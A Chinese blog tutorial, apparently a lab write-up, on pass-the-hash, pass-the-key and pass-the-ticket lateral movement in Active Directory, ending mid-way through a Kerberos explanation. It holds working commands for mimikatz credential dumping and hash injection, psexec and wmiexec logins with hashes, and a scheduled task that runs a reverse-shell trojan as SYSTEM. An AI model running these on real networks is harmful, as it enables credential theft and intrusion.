<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="内网渗透pass系列攻击, 学的越深越发现自己的渺小">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>内网渗透pass系列攻击 | 学的越深越发现自己的渺小</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 5.2.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">学的越深越发现自己的渺小</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">学的越深越发现自己的渺小</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/7.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">内网渗透pass系列攻击</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                          <div class="article-tag">
                            <span class="chip bg-color">无标签</span>
                          </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2022-01-29
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h2 id="内网渗透三种最常用的pass系列攻击："><a href="#内网渗透三种最常用的pass系列攻击：" class="headerlink" title="内网渗透三种最常用的pass系列攻击："></a>内网渗透三种最常用的pass系列攻击：</h2><ul>
<li>pass the hash （哈希传递攻击，简称pth）</li>
<li>pass the ticket（票据传递攻击，简称ptt）</li>
<li>pass the key    （密钥传递攻击，简称ptk）</li>
</ul>
<p><strong>环境</strong></p>
<p><img src="/images/187.png"></p>
<h3 id="哈希传递攻击-PTH攻击"><a href="#哈希传递攻击-PTH攻击" class="headerlink" title="哈希传递攻击(PTH攻击)"></a>哈希传递攻击(PTH攻击)</h3><p>在域环境下，检测密码不是先将Hash解密再验证是否正确的。在验证输入的账号密码是否正确的时候，是通过验证Hash是否相同来进行校验的。也就是说，或许我们可以通过获取的Hash来伪造管理员账号密码登录，也就是Hash传递，又叫PTH，通过将获取的NTLM密文传递到验证登录的机器，绕过正常验证进行登录系统。</p>
<h4 id="PTH回顾"><a href="#PTH回顾" class="headerlink" title="PTH回顾"></a><strong>PTH回顾</strong></h4><p>在后渗透中，获取会话之后，首先就是要获取凭证和NTLM hash值。从红队的视角来看，Pth只是横向渗透的开始。获得hash之后，攻击者就可以对它加以利用，比如他们可以尝试破解，但破解hash值还是比较困难的，费时费力，还不一定能搞到正确的密码，于是就诞生了另一种方法。我们来看一下认证过程，认证期间，首先是获取用户输入的密码，然后将其加密得到hash值，然后再把这个加密的hash值用于后期的身份认证。初始认证完成之后，windows就把这个hash值保存到内存中，这样用户在使用过程中就不用重复的输入密码。在凭证转存中，我们可以看到，我们提取了很多的hash值。作为攻击者，我们是不知道密码的，所以在认证的时候，我们直接提供hash值，不用提供密码，windows就会与保存的hash值对比，一致的话，认证就会通过。这就是所谓的pth攻击了。</p>
<h4 id="可利用的协议"><a href="#可利用的协议" class="headerlink" title="可利用的协议"></a><strong>可利用的协议</strong></h4><p>IPC</p>
<p>SMB</p>
<p>WMI</p>
<p>RPC</p>
<h4 id="1-利用IPC-进行攻击"><a href="#1-利用IPC-进行攻击" class="headerlink" title="1.利用IPC$进行攻击"></a>1.利用IPC$进行攻击</h4><h5 id="IPC-概念"><a href="#IPC-概念" class="headerlink" title="IPC$概念"></a>IPC$概念</h5><p>IPC$(Internet Process Connection)是共享”命名管道”的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。</p>
<pre><code>IPC$的使用条件：
开放了139、445端口；
目标开启IPC$文件共享；
获取用户账号密码。

139 或 445 端口开启:ipc 连接可以实现远程登录及对默认共享的访问;而 139 端口 的开启表示 netbios 协议的应用，我们可以通过 139、445 端口实现对共享文件/打印机的访 问</code></pre>
<p>在内网中，默认就会开启IPC$共享文件服务，默认会将C盘共享出来，也就是说，我们可以通过IPC获取目标C盘的权限。</p>
<h5 id="IPC-常用命令"><a href="#IPC-常用命令" class="headerlink" title="IPC$常用命令"></a>IPC$常用命令</h5><table>
<thead>
<tr>
<th>net use</th>
<th>查看当前连接的IPC$</th>
</tr>
</thead>
<tbody><tr>
<td>net use * /del</td>
<td>删除IPC$连接</td>
</tr>
<tr>
<td>net use \\192.168.1.1\ipc$ 密码 /user:域\账号</td>
<td>连接域内IP地址为192.168.1.1的主机</td>
</tr>
<tr>
<td>dir \\192.168.1.1\c$</td>
<td>列出连接的192.168.1.1的C盘文件</td>
</tr>
<tr>
<td>copy c:/12.txt \\192.168.1.1\c$\2.txt</td>
<td>复制本地c盘的12.txt文件到192.168.1.1的c盘并保存为2.txt</td>
</tr>
</tbody></table>
<h5 id="IPC-命令执行"><a href="#IPC-命令执行" class="headerlink" title="IPC$命令执行"></a>IPC$命令执行</h5><p>0.创建连接</p>
<pre><code>net use \\192.168.88.135\ipc$ chen@2021 /user:edu.org\Administrator 
#可以使用其他非管理员用户进行连接，但会拒绝访问，通常使用Administrator</code></pre>
<p>1.通过at命令制定计划进行命令执行。(新版本at命令已经废弃)</p>
<pre><code>at \\192.168.1.1 11:15am cmd /c &quot;whoami&quot;</code></pre>
<p>2.通过schtasks进行计划任务命令执行</p>
<pre><code>copy C:\reverse.exe \\192.168.88.131\c$\reverse.exe 

schtasks /create /tn task1 /tr &quot;C:\reverse.exe&quot; /sc MINUTE /mo 1 /s 192.168.88.131 /RU system /f

schtasks /run /tn task1 /s 192.168.88.131</code></pre>
<h5 id="IPC-常见错误号"><a href="#IPC-常见错误号" class="headerlink" title="IPC$常见错误号"></a>IPC$常见错误号</h5><pre><code>错误号 5，拒绝访问 : 很可能你使用的用户不是管理员权限的，先提升权限;
错误号 51，Windows 无法找到网络路径 : 网络有问题;
错误号 53，找不到网络路径 : ip 地址错误;目标未开机;目标 lanmanserver 服务未启动; 目标有防火墙(端口过滤);
错误号 67，找不到网络名 : 你的 lanmanworkstation 服务未启动;目标删除了 ipc$;
错误号 1219，提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个 ipc$，请删除再连。
错误号 1326，未知的用户名或错误密码:原因很明显了;
错误号 1792，试图登录，但是网络登录服务没有启动:目标 NetLogon 服务未启动。(连接 域控会出现此情况)
错误号 2242，此用户的密码已经过期:目标有帐号策略</code></pre>
<h4 id="2-利用mimikatz进行PTH攻击"><a href="#2-利用mimikatz进行PTH攻击" class="headerlink" title="2.利用mimikatz进行PTH攻击"></a><strong>2.利用mimikatz进行PTH攻击</strong></h4><p>以管理员身份运行mimikatz.exe，然后执行以下命令</p>
<pre><code>privilege::debug

sekurlsa::logonpasswords #hash和明文密码获取

sekurlsa::pth /user:administrator /domain:edu.org /ntlm:414c0887a2140df4d6f2daa20d2adf6f</code></pre>
<p><img src="/images/180.png"></p>
<p>执行完之后会弹出一个命令提示符，执行dir \\192.168.88.131\c$成功无需账号密码获取了域控机器的c盘的权限，列出了c盘的文件</p>
<p>可以把域内IP都遍历一遍，弹出目录的就是存在密码一样。</p>
<p><img src="/images/181.png"></p>
<h5 id="①利用Psexec进行交互"><a href="#①利用Psexec进行交互" class="headerlink" title="①利用Psexec进行交互"></a>①利用Psexec进行交互</h5><p>提权获取一个域控机器的cmd命令提示符，移动到psexec所在目录，执行以下命令（因为psexec是微软自带的工具所以在白名单内)，不过很多杀软已经列入黑名单了</p>
<pre><code>psexec64 \\192.168.88.131 cmd</code></pre>
<p><img src="/images/186.png"></p>
<h5 id="②计划任务反弹shell"><a href="#②计划任务反弹shell" class="headerlink" title="②计划任务反弹shell"></a><strong>②计划任务反弹shell</strong></h5><ul>
<li>(IPC$未登录,但已知明文账号密码情况)</li>
</ul>
<pre><code>C:\Windows\system32&gt;copy C:\reverse.exe \\192.168.88.131\c$\reverse.exe 
#复制木马文件到目标机器

C:\Windows\system32&gt;schtasks /create /tn task1 /U  edu.org\eas  /P chen@2021  /tr &quot;C:\reverse.exe&quot; /sc MINUTE /mo 1 /s 192.168.88.131 /RU system /f
#创建计划任务

C:\Windows\system32&gt;schtasks /run /tn task1 /U  edu.org\eas  /P chen@2021 /s 192.168.88.131
#运行计划任务

C:\Windows\system32&gt;schtasks /delete /tn task1 /f /U  edu.org\eas  /P chen@2021 /s 192.168.88.131
#删除计划任务</code></pre>
<p><img src="/images/183.png"></p>
<ul>
<li>IPC$已登录情况，省略账号密码</li>
</ul>
<pre><code>C:\Windows\system32&gt;schtasks /create /tn task1 /tr &quot;C:\reverse.exe&quot; /sc MINUTE /mo 1 /s 192.168.88.131 /RU system /f
成功: 成功创建计划任务 &quot;task1&quot;。

C:\Windows\system32&gt;schtasks /run /tn task1 /s 192.168.88.131
成功: 尝试运行 &quot;task1&quot;。</code></pre>
<p><img src="/images/184.png"></p>
<p>一分钟后MSF接收到shell</p>
<p><img src="/images/185.png"></p>
<h4 id="3-利用SMB进行PTH攻击"><a href="#3-利用SMB进行PTH攻击" class="headerlink" title="3.利用SMB进行PTH攻击"></a>3.利用SMB进行PTH攻击</h4><pre><code>利用条件
开启445端口
445端口没被过滤</code></pre>
<h5 id="①msf-windows-smb-psexec模块"><a href="#①msf-windows-smb-psexec模块" class="headerlink" title="①msf-windows/smb/psexec模块"></a>①msf-windows/smb/psexec模块</h5><p><img src="/images/182.png"></p>
<h5 id="②kali自带工具pth-smbclient"><a href="#②kali自带工具pth-smbclient" class="headerlink" title="②kali自带工具pth-smbclient"></a>②kali自带工具pth-smbclient</h5><pre><code>pth-smbclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105/c$</code></pre>
<h4 id="4-利用WMI进行PTH攻击"><a href="#4-利用WMI进行PTH攻击" class="headerlink" title="4.利用WMI进行PTH攻击"></a>4.利用WMI进行PTH攻击</h4><p><a target="_blank" rel="noopener" href="https://github.com/maaaaz/impacket-examples-windows/">wmi.exe工具下载</a></p>
<h5 id="WMIC的利用"><a href="#WMIC的利用" class="headerlink" title="WMIC的利用"></a><strong>WMIC的利用</strong></h5><p>WMI的全名为“Windows Management Instrumentation”。从Windows 98开始，Windows操作系统都支持WMI。WMI是由一系列工具集组成的，可以在本地或者远程管理计算机系统。WMI为用户提供了基本信息，并且让用户有权限执行各种管理任务。这种权限是通过身份认证来实现的。当我们有了凭证的时候，我们就可以执行pth攻击来通过身份认证了。</p>
<p>自从PsExec在内网中被严格监控后，越来越多的反病毒厂商将PsExec加入了黑名单，于是攻击者逐渐开始使用WMI进行横向移动。通过渗透测试发现，在使用wmiexec进行横向移动时，Windows操作系统默认不会将WMI的操作记录在日志中，同时攻击脚本无需写入到磁盘，具有极高的隐蔽性。因为在这个过程中不会产生日志，所以，对网络管理员来说增加了攻击溯源的成本。而对攻击者来说，其恶意行为被发现的可能性有所降低、隐蔽性有所提高。由此，越来越多的APT开始使用WMI进行攻击，利用WMI可以进行信息收集、探测、反病毒、虚拟机检测、命令执行、权限持久化等操作。</p>
<pre><code>利用条件
WMI 服务开启(默认开启)
目标主机开放135和445端口。(135 端⼝是 WMIC 默认的管理端⼝，wimcexec 使⽤445端⼝传回显)
135 端口未被过滤(防火墙拦截)</code></pre>
<pre><code>wmiexec.exe -hashes 00000000000000000000000000000000:414c0887a2140df4d6f2daa20d2adf6f edu.org/Administrator@192.168.88.135</code></pre>
<p><img src="/images/188.png"></p>
<pre><code>wmiexec.exe administrator:chen@2021@192.168.88.135</code></pre>
<p><img src="/images/190.png"></p>
<ul>
<li>利用系统自带的工具 wmic 在目标主机上执行任意命令</li>
</ul>
<p>远程创建进程</p>
<pre><code>wmic /node:192.168.88.135 /user:edu.org\Administrator /password:chen@2021 process call create &quot;cmd.exe /c echo 123 &gt; c:\1.txt&quot;</code></pre>
<p>缺点:无法回显命令</p>
<p><img src="/images/189.png"></p>
<h3 id="密钥传递攻击-PTK攻击"><a href="#密钥传递攻击-PTK攻击" class="headerlink" title="密钥传递攻击(PTK攻击)"></a>密钥传递攻击(PTK攻击)</h3><p>ptk是在域中攻击kerberos认证的一种方式，原理是通过获取用户的aes hmac，通过kerberos认证，可在NTLM认证被禁止的情况下用来实现类似pth的功能。</p>
<h4 id="利用mimikatz获取aes"><a href="#利用mimikatz获取aes" class="headerlink" title="利用mimikatz获取aes"></a>利用mimikatz获取aes</h4><pre><code>mimikatz # privilege::debug

mimikatz # sekurlsa::ekeys</code></pre>
<p><img src="/images/191.png"></p>
<h4 id="利用MSF获取aes"><a href="#利用MSF获取aes" class="headerlink" title="利用MSF获取aes"></a>利用MSF获取aes</h4><p><strong>mimikatz模块的使用需要Administrator权限或者System权限</strong>。MSF中自带mimikatz模块，MSF中的 mimikatz 模块同时支持32位和64位的系统，但是该模块默认是加载32位的系统，所以如果目标主机是64位系统的话，直接默认加载该模块会导致很多功能无法使用。而且在64位系统下必须先查看系统进程列表，然后将meterpreter进程迁移到一个64位程序的进程中，才能加载mimikatz并且查看系统明文。但是在32位系统下则没有这个限制。</p>
<p>先提权，然后进程迁移到一个x64又是管理员的进程</p>
<p><img src="/images/192.png"></p>
<p>加载mimikatz模块，执行mimikatz命令，获取aes_hmac</p>
<p><img src="/images/193.png"></p>
<h4 id="利用Cobalt-Strike获取aes"><a href="#利用Cobalt-Strike获取aes" class="headerlink" title="利用Cobalt Strike获取aes"></a>利用Cobalt Strike获取aes</h4><pre><code>beacon&gt; mimikatz &quot;sekurlsa::ekeys&quot;</code></pre>
<p><img src="/images/194.png"></p>
<h4 id="攻击样例"><a href="#攻击样例" class="headerlink" title="攻击样例"></a>攻击样例</h4><p>在实际上，PTK传递比PTH传递用的少，因为PTK传递需要一个前提条件，<strong>主机必须打了补丁kb2871997</strong></p>
<pre><code>sekurlsa::pth /user:administrator /domain:edu.org /aes256:30d6609fbfd3209395999076705feb371739f36da318aa90b33c19b75241b1aa</code></pre>
<p>在弹出的cmd里利用dir进行域内所有机器的遍历</p>
<p>dir \\192.168.88.0\c$ …..dir \\192.168.88.255\c$，如果<strong>不是显示账号密码不正确</strong>就说明目标机器的hash和该机器一样。</p>
<p><img src="/images/181.png"></p>
<h3 id="票据传递攻击-PTT攻击"><a href="#票据传递攻击-PTT攻击" class="headerlink" title="票据传递攻击(PTT攻击)"></a>票据传递攻击(PTT攻击)</h3><h4 id="Kerberos认证"><a href="#Kerberos认证" class="headerlink" title="Kerberos认证"></a>Kerberos认证</h4><p>弄清Kerberos认证过程，最有利于帮助我们理解域内的金票和银票。Kerberos是一种网络身份验证协议,旨在通过密钥加密技术为客户端/服务器应用程序提供身份验证,主要用在域环境下的身份验证。</p>
<p>域控的账号密码可以登录域内任意一台主机，那么主机是如何检测域控账号密码是否正确的呢？检验账号密码可以有两种方法，询问域控或者设置一个专门检测账号密码是否正确的第三方中心。在域中便使用到了第三方中心来检验输入的账号密码是否相同。这种第三方中心叫KDC密钥分发中心。</p>
<p><img src="/images/195.png"></p>
<h5 id="几个相关的名词"><a href="#几个相关的名词" class="headerlink" title="几个相关的名词"></a>几个相关的名词</h5><h6 id="①KDC"><a href="#①KDC" class="headerlink" title="①KDC"></a><strong>①KDC</strong></h6><p>KDC（Key Distribution Center）密钥分发中心，维护所有账户的名称和Master Key（key的hash code）<br>在KDC中又分为两个部分：Authentication Service(AS,身份验证服务)和Ticket Granting Service(TGS,票据授权服务)</p>
<h6 id="②AS"><a href="#②AS" class="headerlink" title="②AS"></a><strong>②AS</strong></h6><p>授权服务（Authorization Server），对于上面的流程1，提供初始授权认证，用户表明需求并使用密码对请求进行加密，AS用提供的密码对请求进行解密后得到的请求内容，返回给用户一个TGT（票据授权票据 ticket granting tickets）（用一个密码加密）</p>
<h6 id="③TGS"><a href="#③TGS" class="headerlink" title="③TGS"></a><strong>③TGS</strong></h6><p>用户得到TGT之后使用TGT去访问TGS（票据授权中心Ticket Granting Server），</p>
<p>TGS验证TGT后（使用密钥解密），返回一个Ticket给用户；用户得到Ticket后去访问Server，Server收到Ticket和KDC进行验证，通过后提供服务</p>
<h6 id="④DC和AD"><a href="#④DC和AD" class="headerlink" title="④DC和AD"></a><strong>④DC和AD</strong></h6><p>DC是Domain Controller的缩写,即域控制器;AD是Active Directory的缩写,即活动目录。<br> DC中有一个特殊用户叫做:krbtgt,它是一个无法登录的账户,是在创建域时系统自动创建的,在整个kerberos认证中会多次用到它的Hash值去做验证。<br> AD会维护一个Account Database(账户数据库). 它存储了域中所有用户的密码Hash和白名单。只有账户密码都在白名单中的Client才能申请到TGT</p>
<h6 id="⑤票据"><a href="#⑤票据" class="headerlink" title="⑤票据"></a><strong>⑤票据</strong></h6><p>在内网渗透中，票据分为白银票据和黄金票据。分别对应域普通用户的票据和域管理员的票据。票据就是Kerberos认证协议的Ticket，因为已经经过了AS和TGS的校验，所以获取了票据之后，可以任意登录目标主机</p>
<h6 id="⑥krbtgt用户"><a href="#⑥krbtgt用户" class="headerlink" title="⑥krbtgt用户"></a>⑥krbtgt用户</h6><p>在查询域内用户的时候，总会看到一个用户叫krbtgt。krbtgt账户其实就是KDC秘钥分发中心用的超管账户。我们拿着krbtgt账户的票据，去访问域内机器，目标主机会认为我们是KDC秘钥分发中心，所以直接给了最高的权限允许我们访问。</p>
<h5 id="kerberos认证过程"><a href="#kerberos认证过程" class="headerlink" title="kerberos认证过程"></a>kerberos认证过程</h5><h6 id="粗略的验证流程"><a href="#粗略的验证流程" class="headerlink" title="粗略的验证流程"></a><strong>粗略的验证流程</strong></h6><p>如果把 Kerberos 中的票据一类比作一张门禁卡,那么 Client 端就是住客,Server 端就是房间,而 KDC 就是小区的门禁。住客想要进入小区,就需要手里的门禁卡与门禁想对应,只有通过门禁的检验,才能打开门禁进入小区。</p>
<p>需要注意的是,小区门禁卡只有一张,而Kerberos认证则需要两张票</p>
<h6 id="详解认证流程"><a href="#详解认证流程" class="headerlink" title="详解认证流程"></a><strong>详解认证流程</strong></h6><p>当 Client 想要访问 Server 上的某个服务时,需要先向 AS 证明自己的身份,验证通过后AS会发放的一个TGT,随后Client再次向TGS证明自己的身份,验证通过后TGS会发放一个ST,最后Client向 Server 发起认证请求,认证通过后，开始和Client交互。</p>
<p><strong>第一步Client与AS交互</strong></p>
<p><strong>请求：</strong></p>
<p>Client向KDC的Authentication Service发送Authentication Service Request（KRB_AS_REQ）。</p>
<p>内容包含：</p>
<ul>
<li>Pre-authentication data：包含用以证明自己身份的信息。就是证明自己知道自己声称的那个account的Password。一般地，它的内容是一个被Client的Master key加密过的Timestamp。</li>
<li>Client name &amp; realm</li>
<li>KDC的Ticket Granting Service的Server Name</li>
</ul>
<p><strong>响应：</strong></p>
<p>AS（Authentication Service）通过它接收到的KRB_AS_REQ验证发送方的是否是在Client name &amp; realm中声称的那个人，也就是说要验证发送放是否知道Client的Password。所以AS只需从Account Database中提取Client对应的Master Key对Pre-authentication data进行解密，如果是一个合法的Timestamp，则可以证明发送方提供的是正确无误的密码。</p>
<p>验证通过之后，AS将一份Authentication Service Response（KRB_AS_REP）发送给Client。</p>
<p>KRB_AS_REQ主要包含两个部分：</p>
<ul>
<li>被Client的Master Key加密过的Logon Session Key</li>
<li>被自己（KDC）的Key加密过的TGT。TGT主要包含三部分内容：</li>
</ul>
<p>（1）经过KDC中的krbtgt的密码HASH加密的 Logon Session Key(登录会话密钥)（2）Client name &amp; realm （3）End Time：TGT的到期时间</p>
<p>Client通过自己的Master Key对第一部分解密获得Logon Session Key之后，携带着TGT便可以进入下一步：TGS（Ticket Granting Service）Exchange。</p>
<p><strong>第二步Client与TGS交互</strong></p>
<p><strong>请求：</strong></p>
<p>Client向KDC中的TGS（Ticket Granting Service）发送Ticket Granting Service Request（KRB_TGS_REQ）</p>
<p>内容包括：</p>
<ul>
<li><p>TGT：Client通过AS Exchange获得的被KDC Key加密的Ticket Granting Ticket。</p>
</li>
<li><p>Authenticator：用以证明当初TGT的拥有者是否就是自己，所以它用Logon Session Key来进行加密。</p>
<p>内容包括：（1）Client Info （2）Timestamp</p>
</li>
<li><p>Client name &amp; realm</p>
</li>
<li><p>Server name &amp; realm：这是Client试图访问的那个Server</p>
</li>
</ul>
<p><strong>响应：</strong></p>
<p>TGS先通过自己的Master Key对Client提供的TGT进行解密，从而获得这个Logon Session Key。再通过这个Logon Session Key解密Authenticator进行验证。TGS验证通过后发ST(Service Ticket)票。</p>
<p>认证通过后TGS生成使用Logon Session Key（SKDC-Client）加密过用于Client和Server之间通信的Session Key（SServer-Client），Server的Master Key进行加密的ST(Service Ticket)</p>
<p>内容包括：</p>
<ul>
<li><p>经过 Logon session key加密的Client和Server之间的Session Key</p>
</li>
<li><p>经过Server的Master Key进行加密的ST(Service Ticket)。</p>
</li>
</ul>
<p>Ticket包含以下一些内容：<br> （1）Session Key （2）Client name &amp; realm（3）End Time：Ticket的到期时间</p>
<p>Client 收到TGS的响应，使用 Logon session key，解密第一部分后获得 Session Key （注意区分 Logon Session Key 与 Session Key 分别是什么步骤获得的，及其的区别）。有了 Session Key 和 ST(Service Ticket)， Client 就可以直接和 Server 进行交互，而无须在通过 KDC 作中间人了。</p>
<p><strong>第三步Client与Server交互</strong></p>
<p>Client向Server发送KRB_AP_REQ</p>
<p>内容包括：</p>
<ul>
